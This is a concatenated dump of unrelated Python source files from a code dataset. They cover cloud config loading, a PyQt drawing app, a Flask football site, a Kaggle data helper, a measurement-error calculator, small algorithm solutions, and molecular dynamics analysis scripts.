config_data[constants.LOCALHOST]:\n config_data[constants.LOCALHOST]['runtime'] = constants.LOCALHOST_RUNTIME_DEFAULT\n\n verify_runtime_name(config_data[constants.LOCALHOST]['runtime'])\n\n if 'storage' not in config_data['lithops']:\n config_data['lithops']['storage'] = constants.STORAGE_BACKEND_DEFAULT\n sb = config_data['lithops']['storage']\n logger.debug(\"Loading Storage backend module: {}\".format(sb))\n sb_config = importlib.import_module('lithops.storage.backends.{}.config'.format(sb))\n sb_config.load_config(config_data)\n\n return config_data\n\n\ndef extract_storage_config(config):\n storage_config = {}\n sb = config['lithops']['storage']\n storage_config['backend'] = sb\n storage_config['bucket'] = config['lithops']['storage_bucket']\n storage_config[sb] = config[sb]\n storage_config[sb]['user_agent'] = 'lithops/{}'.format(__version__)\n\n if 'storage_region' in config['lithops']:\n storage_config[sb]['region'] = config['lithops']['storage_region']\n\n return storage_config\n\n\ndef extract_localhost_config(config):\n localhost_config = config[constants.LOCALHOST].copy()\n\n return localhost_config\n\n\ndef extract_serverless_config(config):\n serverless_config = config[constants.SERVERLESS].copy()\n sb = config[constants.SERVERLESS]['backend']\n serverless_config[sb] = config[sb]\n serverless_config[sb]['user_agent'] = 'lithops/{}'.format(__version__)\n\n if 'region' in config[constants.SERVERLESS]:\n serverless_config[sb]['region'] = config[constants.SERVERLESS]['region']\n\n return serverless_config\n\n\ndef extract_standalone_config(config):\n standalone_config = config[constants.STANDALONE].copy()\n sb = config[constants.STANDALONE]['backend']\n standalone_config[sb] = config[sb]\n standalone_config[sb]['user_agent'] = 'lithops/{}'.format(__version__)\n\n if 'region' in config[constants.STANDALONE]:\n standalone_config[sb]['region'] = config[constants.STANDALONE]['region']\n\n return 
standalone_config\n","sub_path":"lithops/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":9751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"510771865","text":"import sys\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nfrom PyQt5.QtGui import QPainter, QPen\nfrom PyQt5.QtCore import Qt\n\nfrom random import randint\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(1080, 720)\n MainWindow.setStyleSheet(\"\")\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.pushButton = QtWidgets.QPushButton(self.centralwidget)\n self.pushButton.setGeometry(QtCore.QRect(440, 580, 201, 81))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.pushButton.setFont(font)\n self.pushButton.setStyleSheet(\"background-color: white;\")\n self.pushButton.setObjectName(\"pushButton\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 1080, 26))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.pushButton.setText(_translate(\"MainWindow\", \"Создать окружность\"))\n\n\nclass MyWidget(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pushButton.clicked.connect(self.make)\n self.check = False\n self.colors = [Qt.yellow, Qt.red, Qt.white, Qt.black, Qt.blue, Qt.darkBlue, Qt.cyan, Qt.green]\n\n def make(self):\n self.check = True\n self.update()\n\n def paintEvent(self, event):\n if self.check:\n painter = QPainter(self)\n painter.setPen(QPen(self.colors[randint(0, 7)], 15, Qt.SolidLine))\n n = randint(200, 500)\n painter.drawEllipse(640 - int(n / 2) - 100, 310 - int(n / 2), n, n)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = MyWidget()\n ex.show()\n sys.exit(app.exec_())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"101769913","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n \n def __repr__(self):\n if self:\n return \"{} -> {}\".format(self.val, repr(self.next))\n\n#class Solution(object):\n# def partition(self, head, x):\n# \"\"\"\n# :type head: ListNode\n# :type x: int\n# :rtype: ListNode\n# \"\"\"\n# # two new lists\n# lessDummy,greaterDummy=ListNode(-1),ListNode(-1)\n# less,greater=lessDummy,greaterDummy\n# \n# while head:\n# if head.val= 1024:\n M = kb / 1024\n if M >= 1024:\n G = M / 1024\n return \"%.2fG\" % (G)\n else:\n return \"%.2fM\" % (M)\n elif kb == 0:\n return 'Folder vacio'\n else:\n return \"%.2fkb\" % (kb)\n\n\n#%%\n def check_path(self,path_check):\n '''\n Valida que exista el path\n\n Returns\n -------\n None.\n\n '''\n self.dir_exist = os.path.exists(path_check)\n \n#%%\n def get_lst_files(self,path_data,tipo):\n '''\n 
Lista los archivo de un directorio segun el tipo de solicitado.\n\n Parameters\n ----------\n path_data : string\n Ruta del directorio que contiene los archivos.\n tipo : string\n Extensión o tipo de archivo.\n\n Returns\n -------\n None.\n\n '''\n try:\n self.lst_files = [f for f in glob.glob(str(path_data)+'/**/*.'+ tipo.lower(), recursive=True)]\n \n except Exception as exc:\n self.show_error(exc)\n \n \n#%% \n # Carga datos desde archivos tipo CSV\n def get_data_csv(self, the_path):\n '''\n Parameters\n ----------\n the_path : TYPE\n DESCRIPTION.\n\n Returns\n -------\n None.\n\n '''\n\n try:\n self.data = pd.read_csv(the_path)\n \n except Exception as exc:\n self.show_error(exc)\n\n#%% \n def get_data_csv_nozip(self, the_path):\n '''\n Obtiene un archivo de datos en CSV sin comprimir\n \n Parameters\n ----------\n the_path : TYPE\n DESCRIPTION.\n\n Returns\n -------\n None.\n\n '''\n\n try:\n with open(the_path, 'rb') as fx:\n result = chardet.detect(fx.read())\n \n child = os.path.splitext(os.path.basename(the_path))[0]\n print('File: {} - {}'.format(child,result))\n self.data = pd.read_csv(the_path\n )\n \n except Exception as exc:\n self.show_error(exc)\n\n\n########################################\n## Métodos de Kaggle (fuente de datos) #\n########################################\n\n#%%\n \n def list_competition_kaggle(self,competition):\n '''\n Listar \"competencias\" de Kaggle que contengan una cadena\n \n '''\n try:\n self.lst_competition = self.api.competitions_list(search=competition)\n print('{}Competition: *{}*'.format(os.linesep,competition))\n [print('-->',c) for c in self.lst_competition]\n \n except Exception as exc:\n self.show_error(exc)\n\n#%% \n def list_files_competition_kaggle(self):\n try:\n self.lst_files_c = self.api.competition_list_files(self.competition)\n print('{}Datasets in: {}'.format(os.linesep,self.competition))\n [print('-->',c) for c in self.lst_files_c]\n \n except Exception as exc:\n self.show_error(exc)\n\n#%% \n def get_data_from_kaggle_c(self,path_kaggle_files):\n try:\n self.api.competition_download_file(self.competition, \n self.dataset,\n path_kaggle_files,\n force=True,\n quiet=False)\n \n except Exception as exc:\n self.show_error(exc)\n\n\n\n#%%\n\n def list_dataset_kaggle(self,dataset, show = False):\n try:\n self.ds = {}\n self.lst_datasets = self.api.datasets_list(search=dataset)\n print('{}Datasets about: *{}*'.format(os.linesep,dataset))\n \n for x in self.lst_datasets:\n self.ds[x['title']] = x['ref']\n \n if show:\n for x in self.lst_datasets:\n print(x['title'])\n pp = pprint.PrettyPrinter(depth=50)\n pp.pprint(x)\n break\n \n except Exception as exc:\n self.show_error(exc)\n\n#%% \n def show_kaggle_datasets(self):\n try:\n for x,y in self.ds.items():\n print('-- {} ---> {}'.format(x,y))\n \n except Exception as exc:\n self.show_error(exc)\n\n#%% \n def get_data_from_kaggle_d(self,path_kaggle_files,dataset_name):\n try:\n self.api.dataset_download_files(dataset_name, \n path_kaggle_files,\n unzip=True,\n quiet=False\n )\n \n except Exception as exc:\n self.show_error(exc)\n\n#%%\n # Control de excepciones\n def show_error(self,ex):\n '''\n Captura el tipo de error, su description y localización.\n\n Parameters\n ----------\n ex : Object\n Exception generada por el sistema.\n\n Returns\n -------\n None.\n\n '''\n trace = []\n tb = ex.__traceback__\n while tb is not None:\n trace.append({\n \"filename\": tb.tb_frame.f_code.co_filename,\n \"name\": tb.tb_frame.f_code.co_name,\n \"lineno\": tb.tb_lineno\n })\n \n tb = tb.tb_next\n \n 
print('{}Something went wrong:'.format(os.linesep))\n print('---type:{}'.format(str(type(ex).__name__)))\n print('---message:{}'.format(str(type(ex))))\n print('---trace:{}'.format(str(trace)))\n \n#%% \n def muestra_archivos(self):\n '''\n Imprime en pantalla cada uno de los elementos contenidos en lst_files\n\n Returns\n -------\n None.\n\n '''\n try:\n for f in self.lst_files:\n child = os.path.splitext(os.path.basename(f))[0]\n print(child)\n \n except Exception as exc:\n self.show_error(exc)\n \n#%% \n def save_df(self,df,filename = None):\n try:\n if filename is not None:\n df.to_excel(filename , sheet_name = 'sheet', index=False)\n \n except Exception as exc:\n self.show_error(exc)\n \n\n\n","sub_path":"clases/cls_extract_data_mf.py","file_name":"cls_extract_data_mf.py","file_ext":"py","file_size_in_byte":9709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"476956227","text":"#! /usr/bin/env python\n# sample script for processing phase using LP methods\n# usage : mdv_to_cfradial.py filename.mdv outdir site_deseg\n\nimport sys\nimport os\nfrom time import time\n\nimport netCDF4\n\nfrom pyart.io import py_mdv, radar\nfrom pyart.io import nc_utils\n\n\ndef dt_to_dict(dt, **kwargs):\n pref = kwargs.get('pref', '')\n return dict([(pref + key, getattr(dt, key)) for key in\n ['year', 'month', 'day', 'hour', 'minute', 'second']])\n\n\nif __name__ == \"__main__\":\n\n # read in the command line arguments\n filename = sys.argv[1]\n outdir = sys.argv[2]\n site_deseg = sys.argv[3]\n\n # read in the mdv file\n my_mdv_object = py_mdv.read_mdv(filename, debug=True)\n myradar = radar.Radar(my_mdv_object)\n\n mydatetime = netCDF4.num2date(\n myradar.time['data'][0], myradar.time['units'],\n calendar=myradar.time['calendar']) # append a datetime object\n mydict = dt_to_dict(mydatetime)\n mydict.update(\n {'scanmode': {'ppi': 'sur', 'rhi': 'rhi'}[myradar.sweep_mode[0]],\n 'site_deseg': site_deseg})\n ofilename = outdir + '%(scanmode)scmac%(site_deseg)s.a1.%(year)04d%(month)02d%(day)02d.%(hour)02d%(minute)02d%(second)02d.nc' % mydict\n netcdf_obj = netCDF4.Dataset(ofilename, 'w', format='NETCDF4')\n nc_utils.write_radar4(netcdf_obj, myradar)\n netcdf_obj.close()\n","sub_path":"examples/mdv_to_cfradial.py","file_name":"mdv_to_cfradial.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"552807389","text":"#-----------------------------------------\n# mainfile.py\n# creating first flask application\n#-----------------------------------------\nfrom flask import Flask, render_template, request, redirect\n#from flask_restless import APIManager\nfrom flask_sqlalchemy import SQLAlchemy\nfrom models import app, db, Player, Teams, Weeks\nimport flask_whooshalchemy as wa\nimport os\nimport requests\nimport subprocess\nimport platform\n\nwa.whoosh_index(app, Player)\n\n@app.route('/')\ndef index():\n return render_template('splash.html')\n \n# search function\n@app.route('/search/')\n@app.route('/splash/search')\ndef search():\n searches = Player.query.whoosh_search(request.args.get('query')).all()\n if not searches:\n searches = None\n return render_template('search.html', searches=searches)\n \n# Navigates to weeks page\n@app.route('/weeks/')\ndef weeks():\n week = db.session.query(Weeks).all()\n newList = []\n newList2 = []\n for i in range(0,(len(week)+1)):\n if i == len(week):\n break\n if len(newList2) == 2:\n newList.append(newList2)\n newList2 = []\n if 
len(newList2) < 2:\n            newList2.append(week[i])\n    newList2.append(week[-2])\n    newList2.append(week[-1])\n    newList.append(newList2)\n    return render_template('weeks.html' , week = newList)  \n    \n# Navigates to players page\n@app.route('/players/')\ndef players():\n    players_ = db.session.query(Player).all()\n    newDict = {}\n    for i in players_:\n        if i.pos in newDict:\n            newDict[i.pos].append(i)\n        else:\n            newDict[i.pos] = [i]\n    return render_template('players.html', playerss = newDict)\n\n# Navigates to ind player's page\n@app.route('/brady/<int:player_id>')\ndef brady(player_id):\n    players_ = db.session.query(Player).filter_by(id = player_id).first()\n    return render_template('brady.html', player = players_)\n\n# Navigates to teams page\n@app.route('/teams/')\ndef teams():\n    team = db.session.query(Teams).all()\n    return render_template('teams.html', team = team)\n\n# Navigates to Patriots page\n@app.route('/teampage/<team_name>')\ndef teampage(team_name):\n    team = db.session.query(Teams).filter_by(team = team_name).first()\n    qb = db.session.query(Player).filter_by(pos = \"QB\").first()\n    return render_template('teampage.html', team = team, qb = qb)\n\n#Navigates to about page\n@app.route('/about/')\ndef about():\n    return render_template('about.html')\n    \n# Navigates to game page\n@app.route('/game/<team_name>')\ndef game(team_name):\n    game = db.session.query(Weeks).all()\n    newList = []\n    newList2 = []\n    for i in game:\n        if len(newList2) == 2:\n            newList.append(newList2)\n            newList2 = []\n        if len(newList2) <= 2:\n            newList2.append(i)\n    newList2.append(game[-2])\n    newList2.append(game[-1])\n    newList.append(newList2)\n    for k in newList:\n        if (k[0].team == team_name) or (k[1].team == team_name):\n            game = k\n    return render_template('gamepage.html', game = game)\n    \n# Navigates to Home/Splash page\n@app.route('/splash/')\ndef splash():\n    return render_template('splash.html')\n    \n# Navigates to unit test page\n@app.route('/test/')\ndef test():\n# Checks to see if the OS is Windows/Linux system\n    if platform.system() == 'Windows':\n        process = subprocess.Popen([\"python\", \"-m\", \"coverage\", \"run\", \"--branch\", \"test.py\"],\n                             stdout=subprocess.PIPE,\n\t\t\t\t\t\t\t stderr=subprocess.PIPE,\n\t\t\t\t\t\t\t stdin=subprocess.PIPE)\n\n    else:\n        process = subprocess.Popen([\"python3\", \"-m\", \"coverage\", \"run\", \"--branch\", \"test.py\"],\n                             stdout=subprocess.PIPE,\n\t\t\t\t\t\t\t stderr=subprocess.PIPE,\n\t\t\t\t\t\t\t stdin=subprocess.PIPE)\n\n    out, err = process.communicate()\n    output=err+out\n    output = output.decode(\"utf-8\")\n    return render_template('test.html', output = \"\\n\".join(output.split(\"\\n\")))\n\n\nif __name__ == \"__main__\":\n    app.run()\n\n","sub_path":"mainfile.py","file_name":"mainfile.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"467253514","text":"\n# Коэффициенты (N = 3,4,5)\nTPN = [4.3, 3.2, 2.8] # Значения коэффициентов Стьюдента tP, N в зависимости от числа наблюдений N при доверительной вероятности Р = 95 %:\nUPN = [0.94, 0.76, 0.64] # Коэффициенты uP, N для проверки результатов наблюдений на наличие грубых погрешностей в зависимости от объема выборки N для доверительной вероятности Р = 95 %:\nBPN = [1.30, 0.72, 0.51] # Коэффициенты βP, N для расчета доверительной погрешности по размаху выборки для числа наблюдений N доверительной вероятности Р = 95 %:\nSHIFT = 3\n\ndef string_to_func(string):\n    '''\n    Перевод строки в лямбда-функцию\n    string - строка, содержащая описание функции в виде:\n    f(variables) = rule\n    
Пример:\n    f(x,y,z) = x*y*z\n    '''\n    string = string.replace('f', \"lambda\")\n    string = string.replace('(', ' ')\n    string = string.replace(')', ' ')\n    string = string.replace('=', ':')\n    return eval(string)\n\ndef partial_derivative(f, variable, params):\n    '''\n    Нахождение частной производной f по variable когда переменные = params\n    f - функция\n    variable - номер переменной, по которой будем дифференцировать\n    params - значения параметров\n    '''\n    delta = 0.0000001\n    f1 = \"\"\n    f2 = \"\"\n    for i in range(len(params)):\n        if i == variable and i != len(params) - 1:\n            f1 += \"params[\" + str(i) + \"] \" + \"+ delta, \"\n            f2 += \"params[\" + str(i) + \"] \" + \"- delta, \"\n        elif i == variable and i == len(params) - 1:\n            f1 += \"params[\" + str(i) + \"] \" + \"+ delta)\"\n            f2 += \"params[\" + str(i) + \"] \" + \"- delta)\"\n        elif i == len(params) - 1:\n            f1 += \"params[\" + str(i) + \"])\"\n            f2 += \"params[\" + str(i) + \"])\"\n        else:\n            f1 += \"params[\" + str(i) + \"], \"\n            f2 += \"params[\" + str(i) + \"], \"\n\n    derivative = \"(f(\" + f1 + \"-f(\" + f2 +\")/(2*delta)\"\n    return eval(derivative)\n\ndef print_results(R, mean, random_error, random_range_error, SKO, SKOS, complete_error, relative_error):\n    '''\n    Вывод всех вычисленных значений\n    '''\n    print('\\nРазмах = ' + str(R))\n    print('Среднее значение = ' + str(mean))\n    print('СКО = ' + str(SKO))\n    print('СКОС = ' + str(SKOS))\n    print('Случайная погрешность (по Стьюденту) = ' + str(random_error))\n    print('Случайная погрешность (по размаху) = ' + str(random_range_error))\n    print('Полная погрешность = ' + str(complete_error))\n    print('Относительная погрешность = ' + str(relative_error))\n    print('Истинное значение = ' + str(mean) + ' ± ' + str(complete_error) + \"\\n\")\n\n\ndef direct(meterage, instrumental_error, type = 0):\n    '''\n    Вычисления погрешности для прямых измерений.\n    meterage - выборка\n    instrumental_error - инструментальная погрешность\n    type - тип вызова функции:\n        0 - для прямых измерений\n        1 - для косвенных измерений\n    '''\n    meterages_num = len(meterage) # Количество измерений\n    upn = UPN[meterages_num - SHIFT]\n    tpn = TPN[meterages_num - SHIFT]\n    bpn = BPN[meterages_num - SHIFT]\n    meterage = sorted(meterage) # Упорядочиваем в порядке возрастания\n    mean = sum(meterage)/meterages_num #Среднее арифметическое результатов измерений\n    R = meterage[meterages_num-1] - meterage[0] # Размах выборки\n\n    #Проверка на наличие промахов\n    for i in range(meterages_num - 1):\n        if (meterage[i+1]-meterage[i])/2 > upn:\n            print(\"Выборка содержит промахи\")\n\n    # Считаем СКО и СКОС\n    summ = 0\n    for i in range(meterages_num):\n        summ += (meterage[i] - mean)*(meterage[i] - mean)\n\n    SKO = (summ/(meterages_num-1))**0.5\n    SKOS = (summ/((meterages_num-1)*meterages_num))**0.5\n\n    random_error = tpn*SKOS # Случайная погрешность\n    random_range_error = bpn*R # Случайная погрешность по размаху\n\n    complete_error = (random_error*random_error + instrumental_error*instrumental_error)**0.5 # Полная погрешность\n    relative_error = (complete_error/mean)*100 # Относительная погрешность\n    print_results(R, mean, random_error, random_range_error, SKO, SKOS, complete_error, relative_error)\n    if type == 1:\n        return mean, complete_error\n\ndef indirect(func, args_num):\n    '''\n    Вычисления погрешности для косвенных измерений.\n    func - функция\n    args_num - количество переменных в функции\n    '''\n    mean = [0]*args_num\n    complete_error = [0]*args_num\n\n    for a in range(args_num):\n        meterage = []\n        meterages_num = 0\n        while (meterages_num < 3 or meterages_num > 5):\n 
meterages_num = int(input(\"Введите количество измерений: \"))\n\n        # Ввод результатов измерений\n        for i in range(meterages_num):\n            meterage.append(float(input('Введите результат измерения ' + str(i + 1) + ' : ')))\n\n        instrumental_error = float(input(\"Введите значение инструментальной погрешности (половина цены деления или указано на приборе): \"))\n\n        mean[a], complete_error[a] = direct(meterage, instrumental_error, type = 1)\n\n    func = string_to_func(func)\n    mean_func = \"func(\"\n    for i in range(args_num - 1):\n        mean_func += \"mean[\" + str(i) + '], '\n    mean_func += \"mean[\" + str(args_num - 1) + '])'\n    mean_func = eval(mean_func)\n    print(\"Среднее значение функции = \", mean_func)\n\n    derivatives = []\n    for i in range(args_num):\n        derivatives.append(partial_derivative(func, i, mean))\n        print(str(i+1) + \"частная производная = \", derivatives[i])\n\n    complete_error_function = \"(\"\n    for i in range(args_num - 1):\n        complete_error_function += \"(derivatives[\" + str(i) +\"]*complete_error[\" + str(i) + '])**2 +'\n    complete_error_function += \"(derivatives[\" + str(args_num - 1) +\"]*complete_error[\" + str(args_num - 1) + '])**2)**0.5'\n    complete_error_function = eval(complete_error_function)\n    print('Полная погрешность функции = ', complete_error_function)\n    print('Истинное значение функции = ' + str(mean_func) + '±' + str(complete_error_function))\n\ndef main():\n    choice = int(input(\"Для прямых измерений напишите 0,для косвенных - 1 \"))\n    if choice == 0:\n        meterages_number = 0\n        while (meterages_number < 3 or meterages_number > 5):\n            meterages_number = int(input(\"Введите количество измерений: \"))\n        meterage = []\n\n        #Ввод результатов измерений\n        for i in range(meterages_number):\n            meterage.append(float(input('Введите результат измерения ' + str(i+1) + ' : ')))\n\n        #Приборная погрешность\n        instrumental_error = float(input(\"Введите значение инструментальной погрешности (половина цены деления или указано на приборе): \"))\n        direct(meterage, instrumental_error)\n    else:\n        function = input(\"Введите функцию в виде f(x1,x2..xn) = ...: \")\n        num = int(input(\"Введите количество переменных в функции: \"))\n        print(\"Вводите параметры в том порядке, который вы указали в функции\")\n        indirect(function, num)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":8686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"611111281","text":"import a1\nimport unittest\n\n\nclass TestNumBuses(unittest.TestCase):\n    \"\"\" Test class for function a1.num_buses. 
\"\"\"\n\n # Add your test methods for a1.num_buses here.\n def test_Num_Buses_exm_1(self):\n ''' test num_buses method for zero value '''\n actual = a1.num_buses(0)\n expected = 0\n self.assertEqual(expected, actual)\n\n def test_Num_Buses_exm_2(self):\n ''' test num_buses method for minimum non zero value '''\n actual = a1.num_buses(1)\n expected = 1\n self.assertEqual(expected, actual)\n\n def test_Num_Buses_exm_3(self):\n ''' test num_buses method for thresold point value '''\n actual = a1.num_buses(50)\n expected = 1\n self.assertEqual(expected, actual)\n \n def test_Num_Buses_exm_4(self):\n ''' test num_buses method for break point value '''\n actual = a1.num_buses(51)\n expected = 2\n self.assertEqual(expected, actual)\n \n def test_Num_Buses_exm_5(self):\n ''' test num_buses method for large value '''\n actual = a1.num_buses(160)\n expected = 4\n self.assertEqual(expected, actual)\n\n \n\nif __name__ == '__main__':\n unittest.main(exit=False)\n","sub_path":"codes/week 2/test_num_buses.py","file_name":"test_num_buses.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"159797946","text":"'''\nGiven a positive integer n, return the number of the integers in the range [0, n] whose binary representations do not contain consecutive ones.\n\n \n\nExample 1:\n\nInput: n = 5\nOutput: 5\nExplanation:\nHere are the non-negative integers <= 5 with their corresponding binary representations:\n0 : 0\n1 : 1\n2 : 10\n3 : 11\n4 : 100\n5 : 101\nAmong them, only integer 3 disobeys the rule (two consecutive ones) and the other 5 satisfy the rule. \nExample 2:\n\nInput: n = 1\nOutput: 2\nExample 3:\n\nInput: n = 2\nOutput: 3\n \n\nConstraints:\n\n1 <= n <= 109\n'''\n\nclass Solution:\n def findIntegers(self, n: int) -> int:\n x, y = 1, 2\n sol = 0\n n += 1\n while n:\n if n & 1 and n & 2:\n sol = 0\n sol += x * (n & 1)\n n >>= 1\n x, y = y, x + y\n \n return sol\n \n","sub_path":"problems/600_non_negative_integers_without_consecutive_ones.py","file_name":"600_non_negative_integers_without_consecutive_ones.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"554187320","text":"with open('alienin.txt') as file:\n _, WIDTH = (int(i) - 1 for i in file.readline().split())\n PEOPLE_POSITIONS = set(int(i) + 1 for i in file)\n FURTHEST = max(PEOPLE_POSITIONS)\n\n\ndef count(leftPos, rightPos):\n result = 0\n for i in range(leftPos, rightPos + 1):\n if i in PEOPLE_POSITIONS:\n result += 1\n return result\n\nanswer = 0\n\nleft = 1\nright = left + WIDTH\ncurCount = count(left, right)\nmaxCount = curCount\nwhile right < FURTHEST:\n right += 1\n if right in PEOPLE_POSITIONS:\n curCount += 1\n\n left += 1\n if left - 1 in PEOPLE_POSITIONS:\n curCount -= 1\n\n maxCount = max(maxCount, curCount)\n\nanswer = maxCount\n\nwith open('alienout.txt', 'w') as file:\n file.write(str(answer))\n # print(answer)\n","sub_path":"AIOC/AIC&AIO/2011/Alien/alien.py","file_name":"alien.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"235470260","text":"import os, sys\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nplt.plot([1,5,6,8,4,6,7,30,1,2,6,4,9,8,1])\nplt.savefig(\"Lecture16_01.png\",transparent=True)\nplt.show()\n\nnumbers =[1,5,6,8,4,6,7,3,1,2,6,4,9,8,1]\nplt.plot(numbers, 
color=\"green\")\nplt.savefig(\"Lecture16_02.png\",transparent=True)\nplt.show()\n\nnumbers =[1,5,6,8,4,6,7,3,1,2,6,4,9,8,1]\nplt.plot(numbers, color=\"red\", label=\"My numbers\")\nplt.legend(loc='upper left')\nplt.savefig(\"Lecture16_03.png\",transparent=True)\nplt.show()\n","sub_path":"Exercise16/teach.py","file_name":"teach.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"106308996","text":"'''s1level64\nvar counter;\n\nfor (counter = 50; counter <= 90; counter += 10) {\n // draw_a_square\n for (var count = 0; count < 4; count++) {\n moveForward((counter));\n turnRight(90);\n }\n}\n'''\n\nimport turtle\n\nme = turtle.Turtle()\nme.pensize(7)\n\nfor counter in range(50,90,10):\n for count in range(4):\n me.forward(counter)\n me.right(90)\n \ninput()\n","sub_path":"s1level64.py","file_name":"s1level64.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"189333333","text":"import subprocess\nimport fileinput\nimport shutil\nimport numpy as np\nimport MDAnalysis\nfrom MDAnalysis.lib import distances\nimport numpy.linalg\nimport scipy.integrate as integrate\nfrom scipy.integrate import quad\nfrom numpy.linalg import norm\n\n### initiating constants and opening files \n\n#dist=np.zeros(1000)\ncount =0 \nkb = 306.432\nka1 = 57.788\nka2 = 61.243 \nint_free =0\nfree = open(\"free.dat\", \"w\")\nfreeint = open(\"final_free.dat\", \"w\")\nnumbin = 1000\n\nshutil.copyfile('again.data','type2.data')\ncell = [21.6209, 21.6209, 21.6209]\n\n#### loop of lambda values ###\n\nfor i in range(1, 11, 1):\n int_pr = 0\n count =0\n dusum = 0\n file = open(str(i)+\"-dist.dat\", \"w\")\n file1 = open(str(i)+\"-du.dat\", \"w\")\n\n# shutil.copyfile('again.data',str(i)+'.data')\n# shutil.copyfile('sim.in',str(i)+\".in\")\n# for line in fileinput.input(str(i)+\".in\", inplace=True):\n\n# print line.replace(\"again.data\",str(i)+'.data' ),\n \n# new= kb\n# ang1 = ka1\n ang2 = (float(i)/10.0)*ka2\n \n#### changing the bond and angle parameters\n \n# for line in fileinput.input(str(i)+'.data', inplace=True):\n\n# print line.replace(\"ch\", str(new)),\n\n# for line in fileinput.input(str(i)+'.data', inplace=True):\n# print line.replace(\"ang1\", str(ang1)),\n \n# for line in fileinput.input(str(i)+'.data', inplace=True):\n# print line.replace(\"ang2\", str(ang2)), \n\n ###### running lammps ###\n \n# subprocess.call([\"mpirun\", \"-np\", \"4\", \"lammps-daily\", \"-in\", str(i)+\".in\"])\n# shutil.copyfile('log.lammps',str(i)+\".lammps\")\n# shutil.copyfile('dump.dcd',str(i)+\".dcd\") \n\n ## reading in trajectory and setting up selections \n \n u = MDAnalysis.Universe('chargeFFat.psf',str(i)+\".dcd\")\n num = len(u.trajectory)\n# sel = u.select_atoms(\"bynum 751 \")\n# sel1 = u.select_atoms(\"bynum 732\")\n \n \n dist=np.zeros(num+1)\n du=np.zeros(num+1)\n deg=np.zeros(num+1)\n theta=np.zeros(num+1)\n ### loop for calculating distance information from trajectory \n \n for ts in u.trajectory:\n count = count+1\n A = u.select_atoms(\"bynum 732\").center_of_geometry()\n B = u.select_atoms(\"bynum 751 \").center_of_geometry()\n C = u.select_atoms(\"bynum 749 \").center_of_geometry()\n\n BA = A - B\n BC = C - B\n for h in range(0,3):\n if BA[h] > cell[h]/2.0:\n BA[h] = BA[h]-cell[h]\n for h in range(0,3):\n if BA[h] < -cell[h]/2.0:\n BA[h] = BA[h]+cell[h] \n for h in range(0,3):\n if BC[h] > cell[h]/2.0:\n BC[h] = BC[h]-cell[h]\n 
for h in range(0,3):\n if BC[h] < -cell[h]/2.0:\n BC[h] = BC[h]+cell[h]\n theta[count] = np.arccos(np.dot(BA, BC)/(norm(BA)*norm(BC)))\n deg[count] = np.rad2deg(theta[count])\n# print np.rad2deg(theta)\n\n# dist[count]=distances.distance_array(sel.positions, sel1.positions, box = [21.6209, 21.6209, 21.6209, 90, 90, 90])\n\n du[count] = 0.5*ka2*((theta[count]- np.deg2rad(109.6080))**2)\n\n dusum = du[count] + dusum\n \n hist, bin_edges = np.histogram(deg, bins=numbin, range=(0,180), density=True)\n# hi_du, bin_du = np.histogram(du, bins=1000, range=(0,100))\n\n#### loop for manipulating histogram ### \n \n for j in range(1, numbin, 1):\n\n bin = 0.1/float(numbin)\n mid = (bin_edges[j]+ bin_edges[j+1])/2.0\n hi = float(hist[j])*(0.5*ang2*((mid-1.5080)**2))\n# hidu = float(hi_du[j])/(float(num)*bin)\n int_pr = (hi *(bin)) + int_pr\n\n file.write(str(bin_edges[j])+\" \"+str(hist[j])+\"\\n\")\n file1.write(str(bin_edges[j])+\" \"+str(hi)+\"\\n\")\n avdusum = dusum/float(num)\n lam = float(i)/10.0\n free.write(str(lam)+\" \"+str(avdusum)+\"\\n\")\n# int_free = 